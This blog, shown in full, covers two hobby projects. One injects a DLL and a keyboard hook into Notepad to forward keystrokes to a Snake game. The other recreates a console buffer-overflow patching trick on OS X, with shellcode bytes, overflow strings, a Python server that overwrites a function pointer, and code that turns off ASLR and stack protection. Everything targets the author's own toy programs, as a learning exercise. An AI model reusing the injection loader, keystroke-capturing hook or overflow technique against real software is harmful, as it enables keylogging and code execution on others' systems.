	PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
	if (loadLibraryFunc == NULL)
	{
		fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
		return;
	}

	//now create a thread in remote process that loads our target dll using LoadLibraryA

	HANDLE remoteThread = CreateRemoteThread(
		handle,
		NULL, //default thread security
		0, //stack size for thread
		loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
		dllPathRemote, //pointer to variable being passed to thread function
		0, //0 means the thread runs immediately after creation
		NULL); //we don't care about getting back the thread identifier

	if (remoteThread == NULL)
	{
		fprintf(stderr, "Could not create remote thread.\n");
		return;
	}
	else
	{
		fprintf(stdout, "Success! remote thread started in process %lu\n", processID);
	}

	// Wait for the remote thread to terminate
	WaitForSingleObject(remoteThread, INFINITE);

	//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
	VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
	CloseHandle(remoteThread);
	CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
	HANDLE h;
	PROCESSENTRY32 singleProcess;
	h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
		TH32CS_SNAPPROCESS, //get all processes
		0); //ignored for SNAPPROCESS

	if (h == INVALID_HANDLE_VALUE) return 0;

	singleProcess.dwSize = sizeof(PROCESSENTRY32);

	//Process32First fills in the first entry; without it the loop below starts on uninitialized data
	if (!Process32First(h, &singleProcess))
	{
		CloseHandle(h);
		return 0;
	}

	do {

		if (strcmp(singleProcess.szExeFile, name) == 0)
		{
			DWORD pid = singleProcess.th32ProcessID;
			printf("PID Found: %lu\n", pid);
			CloseHandle(h);
			return pid;
		}

	} while (Process32Next(h, &singleProcess));

	CloseHandle(h);

	return 0;
}

int main(int argc, const char** argv)
{
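	if (argc != 3)
	{
		printHelp();
		return 1; //don't fall through and read argv entries that aren't there
	}

	DWORD pid = findPidByName(argv[1]);
	if (pid == 0)
	{
		fprintf(stderr, "Could not find a process named %s\n", argv[1]);
		return 1;
	}

	createRemoteThread(pid, argv[2]);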

	return 0;
}

This was enough to get a message box popping up in a running instance of Notepad, which was super cool. Unfortunately I realized pretty much immediately after I got this working that I had no idea how to go from popping a message box to using this to actually change Notepad’s behaviour.

Celebrate the little things

Let’s Try Hooking!

My message box app could make something new happen in another process, but I actually needed to be able to change the behaviour of the target process. I had heard vaguely about api hooking before, and my limited understanding of it was that it allowed you to either replace existing code paths, or add additional functionality to them. This seemed roughly in line with what I wanted, so I dove down this rabbit hole next.

Googling for how hooking works was less straightforward than dll injection, mostly because hooking is much more complicated. I eventually realized that as long as I wanted to change a program’s response to a Windows system message, I could bypass a lot of this complexity and use a Win32 hook. Given that keyboard input reaches Windows processes as system messages (WM_KEYDOWN and friends), and that a WH_KEYBOARD hook exists for intercepting exactly those, I was in luck.

The MSDN page for hooks provides some basic information about how these types of hooks work, but the general idea is like this (note: I’m a super beginner at all of this so take everything I say with a grain of salt):

Windows apps (and individual Win32 controls) receive events from the OS via system messages.
Before a message is passed to the message handling function for a given Win32 window, it first gets passed to that message type’s “hook chain,” which is a list of functions that perform some action in response to that event type before the window has a chance to respond.
Each hook function is responsible for passing the system message information to the next item in the hook chain
If a hook function doesn’t call the next function in the hook chain, the message can be lost before the window ever gets a chance to respond to it.
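To make the hook chain idea a bit more concrete, here’s a tiny portable simulation of it. This is only a sketch and doesn’t touch the real Win32 API: HookChain, HookFn, call_next, and dispatch are names I made up, with call_next standing in for the role that CallNextHookEx plays in a real hook.

```cpp
#include <assert.h>
#include <stddef.h>

// Hypothetical model of a hook chain; none of these names are Win32 APIs.
struct HookChain;
typedef int (*HookFn)(HookChain* chain, size_t index, int keyCode);

struct HookChain {
    HookFn hooks[8];   // hook functions, called in order
    size_t count;      // number of installed hooks
    int deliveredKey;  // what the "window" finally received (-1 = nothing)
};

// Stand-in for CallNextHookEx: run the next hook, or deliver to the window.
int call_next(HookChain* chain, size_t index, int keyCode)
{
    size_t next = index + 1;
    if (next < chain->count) return chain->hooks[next](chain, next, keyCode);
    chain->deliveredKey = keyCode; // end of the chain: the window sees the message
    return 0;
}

// A well behaved hook: looks at the message and passes it along.
int passthrough_hook(HookChain* chain, size_t index, int keyCode)
{
    return call_next(chain, index, keyCode);
}

// A hook that swallows the message by never calling call_next.
int swallow_hook(HookChain* chain, size_t index, int keyCode)
{
    (void)chain; (void)index; (void)keyCode;
    return 1;
}

// Sends a key through the chain and returns what the window received.
int dispatch(HookChain* chain, int keyCode)
{
    assert(chain != NULL);
    chain->deliveredKey = -1;
    if (chain->count == 0) chain->deliveredKey = keyCode;
    else chain->hooks[0](chain, 0, keyCode);
    return chain->deliveredKey;
}
```

With only passthrough hooks installed, dispatch() hands the key to the window. Put a swallow_hook anywhere in the chain and the window never hears about it.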

Given this information, it seemed reasonable to try to intercept the keyboard events sent to Notepad by creating a hook function which intentionally didn’t call the next function in the hook chain. After perusing the MSDN docs page about using hooks, I figured out that I was going to need to install a WH_KEYBOARD hook into Notepad’s Edit control.

The docs also point out that if you want to install a hook in a process other than your own, what you’re really doing is a form of dll injection. You need to place the hook function in a dll, and use SetWindowsHookEx() to load that dll’s code into the target application.

So with all that in mind, I put on my robe and wizard hat and got to work.

Writing a Simple Hook Payload

I started off by just trying to prevent Notepad from receiving keyboard input at all. All I needed to do for this was to hook the WH_KEYBOARD and then not call the next hook in the hook chain, which seemed like an easy place to start. To write a hook function for WH_KEYBOARD, all you need to do is make sure to match the function signature of KeyboardProc(). Given that I needed this function to do basically nothing, this was pretty easy:

#define WIN32_LEAN_AND_MEAN 
#include <windows.h>
#include "inject_payload_disablekeyinput.h"

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
  return 1;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  return true;
}

Installing A Hook In Notepad.exe

The code for installing a windows hook is very straightforward (and shown below).

bool installRemoteHook(DWORD threadId, const char* hookDLL)
{
	HMODULE hookLib = LoadLibrary(hookDLL);
	if (hookLib == NULL) return false;
	
	HOOKPROC hookFunc = (HOOKPROC)GetProcAddress(hookLib, "KeyboardProc");
	if (hookFunc == NULL) return false;
	
	HHOOK hook = SetWindowsHookEx(WH_KEYBOARD, hookFunc, hookLib, threadId);
	return hook != NULL; //SetWindowsHookEx returns NULL if the hook couldn't be installed
}

The threadId function argument is used to install the hook only for Notepad’s Edit control (otherwise it becomes a global hook). Getting the thread id is just a matter of calling GetWindowThreadProcessId() on the HWND for the Edit control. You can get the HWND with the GetWindowForProcessAndClassName() function from my last post. Here’s that function again:

HWND GetWindowForProcessAndClassName(DWORD pid, const char* className)
{
  HWND curWnd = GetTopWindow(0); //0 arg means to get the window at the top of the Z order
  char classNameBuf[256];

  while (curWnd != NULL){
    DWORD curPid;
    DWORD dwThreadId = GetWindowThreadProcessId(curWnd, &curPid);

    if (curPid == pid){
      GetClassName(curWnd, classNameBuf, 256);
      if (strcmp(className, classNameBuf) == 0) return curWnd;

      HWND childWindow = FindWindowEx(curWnd, NULL, className, NULL);
      if (childWindow != NULL) return childWindow;
    }
    curWnd = GetNextWindow(curWnd, GW_HWNDNEXT);
  }
  return NULL;
}

One thing to note about the installRemoteHook() function is that because it gets the function pointer for the callback with GetProcAddress(), the compiled name of the hook callback is important. This meant that I needed to make sure to export that function using extern "C" to prevent the compiler from mangling the function name.

#pragma once
extern "C"
{
  __declspec(dllexport) LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);
}

If you want to see what all of this looks like in practice, the github repo for this blog post has a proof of concept hooking app that uses the hook payload described above to disable key input to an instance of Notepad.

Redirecting Keyboard Input to a Different Process

Simply preventing Notepad from getting keyboard input was cool and all, but it was a far cry from being able to redirect that input to a game. What I wanted to be able to do was both prevent Notepad from getting keyboard input (so that the user couldn’t type characters and mess up what I was rendering), and redirect that key input to the process I was using to control my game logic.

Redirecting the key input to a different process wasn’t much more difficult than preventing key input. I just copy/pasted the code for disabling key input and made the following changes:

The Hooking app opens up a socket, and starts listening for messages before installing the hook
In the payload, when the first keyboard message is intercepted, the payload creates a client socket and connects to the hooking app
Then, whenever a keyboard message is seen by the hook callback, it sends that key code to the hooking app via this client socket

I’m not going to walk through how to set up windows sockets (but all the code for doing so is on the github page for this project). Instead, I just want to share the hook payload that I used to make this all happen.

SOCKET sock = INVALID_SOCKET;

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
  const int BUFLEN = 512;
  char sendBuf[BUFLEN];
  memset(sendBuf, '\0', BUFLEN);

  if (sock == INVALID_SOCKET){
    sock = CreateClientSocket("localhost", "1337");
  }

  int isKeyDown = ((lParam >> 31) & 1) == 0; //bit 31 is the transition state: 0 while the key is being pressed, 1 on release
  if (isKeyDown){
    _itoa_s<512>((int)wParam, sendBuf, 10);
    send(sock, sendBuf, (int)strlen(sendBuf), 0);
  }
  return 1;
}

Extracting the key state from the lparam was a little weird, but it seemed like the best way to get at that information. If you wanted to write a more robust input handling hook, you’d probably care about more of the data in that parameter than I did, but this was enough for getting WASD.
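For reference, here’s a sketch of what pulling apart the rest of that parameter could look like. The bit layout follows the KeyboardProc documentation (repeat count, scan code, extended flag, context code, previous state, transition state). The KeyInfo struct and both function names are made up for this example, and it takes a uint32_t rather than a real LPARAM so that it compiles anywhere.

```cpp
#include <assert.h>
#include <stdint.h>

// Fields packed into the lParam of a WH_KEYBOARD hook callback.
// KeyInfo is a hypothetical helper type, not something from windows.h.
struct KeyInfo {
    unsigned repeatCount; // bits 0-15
    unsigned scanCode;    // bits 16-23
    bool extended;        // bit 24
    bool altDown;         // bit 29 (context code)
    bool wasDown;         // bit 30 (previous key state)
    bool released;        // bit 31 (transition state)
};

KeyInfo decode_key_lparam(uint32_t lParam)
{
    KeyInfo info;
    info.repeatCount = lParam & 0xFFFFu;
    info.scanCode    = (lParam >> 16) & 0xFFu;
    info.extended    = ((lParam >> 24) & 1u) != 0;
    info.altDown     = ((lParam >> 29) & 1u) != 0;
    info.wasDown     = ((lParam >> 30) & 1u) != 0;
    info.released    = ((lParam >> 31) & 1u) != 0;
    return info;
}

// True only for the first press of a key (not auto-repeat, not release).
bool is_initial_press(uint32_t lParam)
{
    KeyInfo info = decode_key_lparam(lParam);
    return !info.released && !info.wasDown;
}
```

For Snake, something like is_initial_press() would probably be the most useful filter, since holding a key down generates a stream of repeat messages that the game doesn’t care about.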

Once this was working, it was a very small jump from there to a working real time game.
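On the receiving end, the game process just has to turn the text it gets from the socket back into a key. Here’s a minimal sketch of that step, assuming each recv() call hands back exactly one message (TCP doesn’t actually promise this). The Direction enum and direction_from_message() are illustrative names, not code from the repo.

```cpp
#include <assert.h>
#include <stdlib.h>

enum Direction { DIR_NONE, DIR_UP, DIR_LEFT, DIR_DOWN, DIR_RIGHT };

// msg is the decimal text sent by the hook payload, e.g. "87" for the W key.
Direction direction_from_message(const char* msg)
{
    assert(msg != NULL);
    int vk = atoi(msg); // virtual-key codes for letters match uppercase ASCII
    switch (vk) {
        case 'W': return DIR_UP;
        case 'A': return DIR_LEFT;
        case 'S': return DIR_DOWN;
        case 'D': return DIR_RIGHT;
        default:  return DIR_NONE;
    }
}
```

Because the payload sends plain digits with no separator, two quick key presses could in theory arrive glued together. A more robust version would add a delimiter to each message and split on it before parsing.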

Snake, Finally!

So yeah, the fruit of all this labor isn’t super exciting. I made Snake. It lends itself super well to ascii graphics (even if the fact that characters are taller than they are wide is a bit annoying), and I already had the gameplay logic written from a couple posts ago.

There’s not really much interesting to say about implementing Snake, and I’ve already talked through everything else, so I’m going to end things off with another gif of me playing snake in a hijacked Notepad.exe window. I hope you enjoyed the process of getting here as much as I did, because the end product is (as promised) super dumb.

It's a terrible quality gif... but you get the idea

Recreating An Old "Dirty Gamedev Trick"

2019-12-04T00:00:00+00:00

There’s a story that pops up in my twitter feed every 6 months or so. The original version of it is from a Gamasutra article published in 2013 which contained a collection of stories of various “dirty” tricks used in previous games (link). There’s a lot of fun stories in the article but one stands head and shoulders above the rest in terms of awesomeness. I’ve copied the specific story below so that this post makes sense even in the unlikely event of the original link going dead.

(s)elf-exploitation
Jonathan Garrett, Insomniac Games

Ratchet and Clank: Up Your Arsenal was an online title that shipped without the ability to patch either code or data. Which was unfortunate.

The game downloads and displays an End User License Agreement each time it's launched. This is an ascii string stored in a static buffer. This buffer is filled from the server without checking that the size is within the buffer's capacity.

We exploited this fact to cause the EULA download to overflow the static buffer far enough to also overwrite a known global variable. This variable happened to be the function callback handler for a specific network packet. Once this handler was installed, we could send the network packet to cause a jump to the address in the overwritten global. The address was a pointer to some payload code that was stored earlier in the EULA data.

Valuable data existed between the real end of the EULA buffer and the overwritten global, so the first job of the payload code was to restore this trashed data. Once that was done things were back to normal and the actual patching work could be done.

One complication is that the EULA text is copied with strcpy. And strcpy ends when it finds a 0 byte (which is usually the end of the string). Our string contained code which often contains 0 bytes. So we mutated the compiled code such that it contained no zero bytes and had a carefully crafted piece of bootstrap asm to un-mutate it.

By the end, the hack looked like this:

1. Send oversized EULA
2. Overflow EULA buffer, miscellaneous data, callback handler pointer
3. Send packet to trigger handler
4. Game jumps to bootstrap code pointed to by handler
5. Bootstrap decodes payload data
6. Payload downloads and restores stomped miscellaneous data
7. Patch executes

Takeaways: Include patching code in your shipped game, and don't use unbounded strcpy.

Suffice to say that this story is not an example of what modern day game development is like, but I think that’s what makes it so appealing. Most of my day at work is spent sorting out problems in huge codebases made up of abstractions layered over other abstractions layered over third party libraries and legacy code. This is the polar opposite of that, and I want to get me some of it. So this is the story of how I recreated this on OS X.

I want to caveat the entire article by saying that this post is going to contain a lot of terrible assembly. I hadn’t written much assembly before I started this project and I’m sure it shows. That being said, let’s get started!

First: You Can Run Arbitrary Machine Code at Runtime?

The first thing that jumped out at me in this story was the part about sending machine code over the network to be executed by the game. It had never occurred to me that this was possible, despite it being obvious in hindsight. With some help from this article, I was able to prove that this was going to work on OS X too. First I wrote a quick bit of assembly (in this case, enough to call exit(42)):

.text
.globl _main
_main:
        mov $42, %di
        movl $0x2000001, %eax
        syscall

Assembled it with OS X’s built in “as” tool, and disassembled it with objdump to get the hex machine code bytes:

1ff5:	66 bf 2a 00 	movw	$42, %di
1ff9:	b8 01 00 00 02 	movl	$33554433, %eax
1ffe:	0f 05 	syscall

Then I copied those bytes to a string and tried to run it:

int main(void)
{
    char* code = "\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05";
    ((void(*)())code)();
    return 0;
}

The above returns the value 42 and the “return 0” statement never gets executed, which is cool. However, this wasn’t enough to prove anything because it only worked when the code string was a constant. Trying to copy that string to a different (non-constant) buffer and then execute the instructions there failed immediately:

int main(void)
{
    char* code = "\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05";
    char buff[256];
    memcpy(buff, code, 11); // copy just the 11 bytes of machine code; 256 would read past the end of the string
    ((void(*)())buff)(); // will fail with EXC_BAD_ACCESS 
    return 0;
}

As it turns out, OS X has memory protections to help prevent folks from doing these sorts of shenanigans. If you compile on the command line with the arguments “-Wl,-allow_stack_execute”, clang will happily let this code run just fine. In fact, that argument will allow the above code to work whether buff is on the stack, in the bss section, or in the data section.

Note that no matter what I did, I couldn’t get Xcode 10 to recognize that compiler flag, it had to be command line. It’s also important to note that if you compile objective-c code (or objective-c++) with this flag, the flag won’t work. I could be missing something, but I got bored and just fell back to the command line / plain C++ instead of continuing to fight with it.

The Playstation 2 was gone well before I entered the industry, but based on googling and asking a few coworkers who had some experience on it, it seems unlikely that the ps2 had the same kind of memory security, so I don’t feel too bad about disabling OS X’s to get this project done.

Step Two: Useful Buffer Overflows

My next goal was to use a buffer overflow to redirect a function pointer to a buffer that I controlled. I’d never intentionally overflowed a buffer before, but boy do I have experience tracking and fixing memory stomps, so this felt pretty natural (in theory). In practice it was a bit messier. Consider the following code:

void hello();

static char buff[32];
static void(*targetFunc)();

int main(int argc, const char** argv)
{
    targetFunc = hello;
    gets(buff);
    targetFunc();
    return 0;
}

void hello()
{
    printf("Hello World\n");
}

While this code will absolutely crash, it’s not guaranteed that the compiler has positioned the static variables in the bss section of our executable in the same order that they appear in the code. In my case, they were actually located in the opposite order in my executable, as you can see in this snippet of Hopper output.

                     __ZL10targetFunc:        // targetFunc
0000000100001020         dq         0x0000000000000000 ; DATA XREF=_main+29, _main+52
0000000100001028         db  0x00 ; '.'
0000000100001029         db  0x00 ; '.'
000000010000102a         db  0x00 ; '.'
000000010000102b         db  0x00 ; '.'
000000010000102c         db  0x00 ; '.'
000000010000102d         db  0x00 ; '.'
000000010000102e         db  0x00 ; '.'
000000010000102f         db  0x00 ; '.'
                     __ZL4buff:        // buff
0000000100001030         db  0x00 ; '.'                ; DATA XREF=_main+36
0000000100001031         db  0x00 ; '.'
0000000100001032         db  0x00 ; '.'
0000000100001033         db  0x00 ; '.'
; (buff continues below)

Unluckily, this means that try as I might, I couldn’t use the gets() call to change the value of the targetFunc pointer. After a bit of experimentation, I found that (at least for my trivial example), Clang places variables in the bss section in the order they’re encountered in code, so rewriting the code to assign to buff before anything touches targetFunc sorted things out (example below).

void hello()
{
    printf("Hello World\n");
}

static char buff[32];
static void(*targetFunc)();

int main(int argc, const char** argv)
{
    buff[0] = 'c';
    targetFunc = hello;
    gets(buff);
    targetFunc();
    return 0;
}

Of course, all of the above only holds true if both variables are located in the same section in the executable. If, for example, targetFunc was initialized when it was declared, like so:

static void(*targetFunc)() = hello;

It would be placed in the data section of the executable instead of the bss section (since it has an initial value). This doesn’t preclude me from overflowing (I don’t think), but it does mean that I also have to worry about the order that the compiler places the bss section and the data section in the executable. This seemed like more hassle than it was worth for the purposes of this project so I just kept everything in bss all the time.

It seemed like the above code made it possible for a properly crafted input string to overflow and write a new address into the function pointer, so I decided to give that a shot. The address of buff in my executable was 0x0000000100001020. In order to be able to enter this value to gets(), it needed to be converted to ascii. A lot of that address is zero bytes, which don’t have a printable ascii character associated with them, so I had to enter them in terminal by pressing control+space instead. The non zero bytes are 01, 10, and 20, two of which are non printable characters that I ended up copy and pasting from a website so that I didn’t have to figure out how to type them. The last one, 20, is the space character (‘ ‘). In terminal, it looked like this (note the space character at the end):

AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB^@^@^@^A^@^@^P

Copying and pasting the above string is not the same as actually pasting in the ascii characters for bytes 01 and 10. This is just how terminal decided to display that those characters were entered.

In addition to being annoying to enter, this didn’t work because I had forgotten about endianness, and needed to rearrange this input so that the address was specified as a little-endian value. Figuring that out took longer than I’m willing to admit to in a blog post. The correct string looked like this:

AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB ^P^@^@^A^@^@^@
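If it helps to see the byte order spelled out, here’s a small sketch that splits an address into the bytes an x86-64 machine actually stores in memory, least significant byte first. The function name is just something I picked for the example.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Writes the 8 bytes of addr into out, least significant byte first,
// which is the order an x86-64 machine stores a pointer in memory.
void address_to_little_endian(uint64_t addr, unsigned char out[8])
{
    assert(out != NULL);
    for (int i = 0; i < 8; ++i) {
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xFF);
    }
}
```

Feeding it 0x0000000100001020 gives the bytes 20 10 00 00 01 00 00 00, which is the space, ^P, ^@, ^@, ^A, ^@, ^@, ^@ sequence at the end of the string above.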

Finally though, I could demonstrably (using lldb to print the address of targetFunc) use a buffer overflow to set a pointer. Sadly, if I tried the same trick without lldb attached, things failed horribly. It turns out OS X had one more security feature up its sleeve to stall my plan of creating the world’s most insecure application.

A/S/L…R?

ASLR, or Address Space Layout Randomization, is a security technique that rearranges the locations of key areas of an executable’s data, including (at least on OS X Mojave) the .bss section. This means that every time I ran the test application without lldb attached, the address of the character buffer was randomized.

The concept of ASLR was first published in 2001, and first used in a “mainstream” OS in 2003 (according to wikipedia at least). Given that the PS2 was launched in 2000, I’m relatively confident that there was nothing like this on our story’s hardware. I also found this presentation about game console security which suggests that ASLR didn’t make an appearance on Sony consoles until the PS4. This means that just like before, I can feel good about simply disabling this security feature on my executable. This is accomplished by another clang flag, “-Wl,-no_pie”, where pie refers to “position independent executables.” Unlike earlier however, this flag can be enabled in an Xcode project, you just need to go to your build settings and enable the setting “Generate Position-Dependent Executable.”

Compiling with that flag gave me a lovely little binary which kept the buff variable at the same memory address all the time.

Step Three: Putting Things Together

Now that I was properly redirecting the targetFunc pointer to my buffer, it seemed like the next step was to actually write some code into that buffer to execute. To keep things simple, I started out by reusing the code string that called exit(42) earlier. Unfortunately, a lot of the hex values in my code string couldn’t be represented in ascii at all, so I decided to abandon using gets() and wrote a small python server to pass the code string to my program over a socket. I was going to need to do this eventually anyway so this felt like progress.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = ('localhost', 10002)
s.bind(address)
s.listen(1)

while True:
    connection, addr = s.accept()
    connection.send(b"\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x10\x00\x00\x01\x00\x00\x00")

This also meant making my example program a bit more complicated:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <cstring>
#include <stdio.h>

static char buff[32];
static void(*targetFunc)();

void hello()
{
    printf("Hello World\n");
}

int main(void)
{
    buff[0]='c';
    targetFunc = hello;
    const int SERVER_PORT = 10002;
    const char* SERVER_ADDRESS = "127.0.0.1";
    const int BUFF_LEN = 64;

    struct sockaddr_in sockAddr = {0};
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(SERVER_PORT);
    inet_pton(AF_INET, SERVER_ADDRESS, &sockAddr.sin_addr);
    int socketHandle = socket(AF_INET, SOCK_STREAM, 0);
    
    connect(socketHandle, (struct sockaddr*)&sockAddr, sizeof(sockAddr));
    
    recv(socketHandle, &buff, BUFF_LEN, 0);
    targetFunc();
    return 0;
}

Running this totally worked as long as I had disabled ASLR. I stopped here to celebrate by becoming bored with the project and abandoning it for a month.
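The byte string that the server sends has a simple shape: the machine code, then zero padding out to the end of buff, then the new pointer value in little-endian order. Here’s a sketch of a helper that builds that layout. It assumes the function pointer sits immediately after the buffer with no padding in between, and build_overflow_payload() is a made-up name rather than code from the project.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Builds: [code bytes][zero padding up to bufLen][8-byte little-endian target].
// Returns the number of bytes written, or 0 if the pieces don't fit.
size_t build_overflow_payload(const unsigned char* code, size_t codeLen,
                              size_t bufLen, uint64_t target,
                              unsigned char* out, size_t outCap)
{
    assert(code != NULL && out != NULL);
    if (codeLen > bufLen || bufLen + 8 > outCap) return 0;

    memset(out, 0, bufLen);       // padding that fills the rest of the buffer
    memcpy(out, code, codeLen);   // machine code goes at the start of the buffer
    for (int i = 0; i < 8; ++i) { // pointer value, least significant byte first
        out[bufLen + i] = (unsigned char)((target >> (8 * i)) & 0xFF);
    }
    return bufLen + 8;
}
```

For a 32 byte buffer this produces 40 bytes, and the last 8 are what end up stomping the function pointer.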

Modifying Existing Instructions

Downloading and executing assembly code was already pretty awesome, but given that my end goal was to be able to patch a game using this system, it seemed like it would be way cooler if I could use that assembly to fix bugs in different parts of the program. I’d already used mprotect to mark pages as Read/Write protected in another project (for tracking memory stomps), so it wasn’t a huge stretch to use it to mark pages as executable instead. I still wrote a small test program to make sure it worked.

When running in debug, the code below will return 0 instead of 42, because it modifies the shouldExit42() function to return false. Clang will optimize away the memcpy operation if you compile above -O0, but that didn’t really matter to me because, in the real project, I was going to be hand writing the assembly to do this.

#include <sys/mman.h>
#include <cstring> //for memcpy
#include <unistd.h>
#include <stdint.h>

bool shouldExit42()
{
    return true;
}

bool shouldNotExit42()
{
    return false;
}

int main(int argc, const char * argv[])
{
    int64_t pagesize = getpagesize();
    
    uint8_t* should = (uint8_t*)&shouldExit42;
    uint8_t* shouldNot = (uint8_t*)&shouldNotExit42;

    int64_t shouldPageAddr = pagesize * (int64_t(should)/pagesize);
    uint8_t* shouldPage = (uint8_t*)shouldPageAddr;
    
    mprotect(shouldPage, pagesize, PROT_READ|PROT_EXEC|PROT_WRITE);
    
    memcpy(should,shouldNot, 64);
    
    return shouldExit42() ? 42 : 0;
}

Now, technically the above code is relying on unspecified behaviour, because the POSIX standard says that the behaviour of mprotect is unspecified unless the mapping was established by a call to mmap, but OS X Mojave seems happy to just do what I want this way. Also, the 64 byte size in the memcpy call is total garbage that I pulled out of the air, but it was good enough for the test program.
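For comparison, here’s a sketch of the page math plus the version of this that POSIX does bless, which is changing protections on memory that came from mmap. One thing the page math makes obvious is that a 64 byte patch can straddle two pages, in which case mprotect needs to cover both. All three function names here are made up for the example.

```cpp
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

// Rounds addr down to the start of the page that contains it.
uintptr_t page_start(uintptr_t addr, uintptr_t pageSize)
{
    assert(pageSize != 0 && (pageSize & (pageSize - 1)) == 0); // power of two
    return addr & ~(pageSize - 1);
}

// Number of bytes mprotect must cover, starting at page_start(addr), so that
// every byte of [addr, addr + len) is included, even across a page boundary.
size_t protect_length(uintptr_t addr, size_t len, uintptr_t pageSize)
{
    assert(len > 0);
    uintptr_t first = page_start(addr, pageSize);
    uintptr_t last = page_start(addr + len - 1, pageSize);
    return (size_t)(last - first + pageSize);
}

// Maps a read-only page, makes it writable with mprotect, and writes to it.
// Returns true if every step worked.
bool make_writable_and_poke(void)
{
    size_t pageSize = (size_t)sysconf(_SC_PAGESIZE);
    void* page = mmap(NULL, pageSize, PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (page == MAP_FAILED) return false;

    bool ok = mprotect(page, pageSize, PROT_READ | PROT_WRITE) == 0;
    if (ok) {
        unsigned char* bytes = (unsigned char*)page;
        bytes[0] = 42; // would fault if the page were still read-only
        ok = bytes[0] == 42;
    }
    munmap(page, pageSize);
    return ok;
}
```

With 4096 byte pages, a 64 byte patch starting at 0x1ff0 needs 8192 bytes of protection changed, since the last 48 bytes of the patch land on the next page.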

One caveat to patching code this way is that any changes need to keep the target function the same size, since this won’t move around the rest of the functions in memory (and I don’t even want to think about trying that). Alternatively, it’s possible to add entirely new functions, assuming there’s memory available to store them. I already kinda did this above when I stored assembly code in a buffer and executed it there, so I’m not going to belabour the point any more.

Goodbye Test Programs, Hello Snake

Finally, I felt like I knew enough to try out actually recreating the Gamasutra story in a real project, and I built a small game to use as the target executable. I started out with a tile matching game that used Metal for graphics, but got tired of fighting with making -allow_stack_execute work in a project that included objective-c code, so I scrapped that and built a quick snake game with ncurses. The game sucks, but that’s not really the point, so as you’re reading, you could try to pretend that I’m talking about some totally awesome AAA project instead if it helps.

The (awful) code is up on github here. Most of it doesn’t matter, but a few bits are relevant to this blog post. First is how I’ve set up a few key static vars:

static char eula[1024];
static void(*packetHandler)();
static int randomSeed;

int main()
{	
    memset(eula,0,EULA_LEN);
    randomSeed = 42;
    packetHandler = handleNotificationPacket;
    //rest of code omitted

Clang is going to position these static variables in the bss section in the order they’re first encountered when parsing code (or at least, that’s what it did in all my tests), so any attempt to overwrite the packetHandler pointer by overflowing the eula buffer also needed to stomp on whatever value is stored in randomSeed. Part of my payload’s job was going to be making sure that the randomSeed value was set back to 42 before it got used by the game.

The game starts by downloading data from a server and strcpying it into the EULA buffer. Immediately after the server sends the EULA, it’s also going to send the packet that will trigger a call to the packetHandler() function. I couldn’t do squat until I got packetHandler pointed to the eula buffer, so that’s the first thing I did. This was a little trickier than the last time I used an overflow to set a pointer because now the machine code was getting strcpy’d, meaning it couldn’t contain any null bytes. Initially though, this didn’t matter, since I just wanted to point packetHandler at the eula buffer (which was at 00000000000092b0), and being little-endian means that I only actually needed to write the value 0x92b0.

Put together, this initial step looked like so:

Launch Snake, have it connect to the server
Have the server send 1024 bytes of \x01 to fill the eula buffer
Send 4 bytes of \x02 to fill the random seed.
Send another 4 bytes of \x03 to fill the padding between randomSeed and the function pointer
Send \xB0\x92\x00 to update the function pointer and end the string
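For anyone who wants to see those steps as code, here’s a minimal sketch of how the overflow bytes could be assembled. This is not the server script linked below; build_overflow is a name I made up for illustration, and the sizes and the 0x92b0 address are simply the ones quoted in this post.

```python
import struct

EULA_LEN = 1024      # size of the eula buffer in the snake game
EULA_ADDR = 0x92B0   # address of the eula buffer, as quoted in the post


def build_overflow(code: bytes = b"") -> bytes:
    """Build the bytes to send; strcpy supplies the trailing null itself."""
    if b"\x00" in code:
        raise ValueError("strcpy would stop copying at the first null byte")
    if len(code) > EULA_LEN:
        raise ValueError("code does not fit in the eula buffer")
    filler = code + b"\x01" * (EULA_LEN - len(code))  # fills the eula buffer
    seed = b"\x02" * 4                                 # stomps randomSeed
    padding = b"\x03" * 4                              # padding before the pointer
    # Little-endian address with the high zero bytes dropped: b"\xb0\x92".
    pointer = struct.pack("<Q", EULA_ADDR).rstrip(b"\x00")
    return filler + seed + padding + pointer


payload = build_overflow()
```

The result is 1034 bytes long, and the terminator written by strcpy brings the total to 1035.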

Since it’s a bit long, I won’t show the python I used to do this here, but if you’re interested, you can check it out here.

That part was pretty easy, but once it was working, the game would immediately crash when it received the packet that triggered a call to packetHandler(), since there was nothing of value in the EULA buffer. This kinda sucked, so my next step was to have the EULA buffer actually do something. As a proof of concept, I started by re-purposing the exit(42) code string that I used earlier. The original code string had a few null bytes in it though, so it needed some massaging. As a refresher, here was the original bit of machine code:

\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05

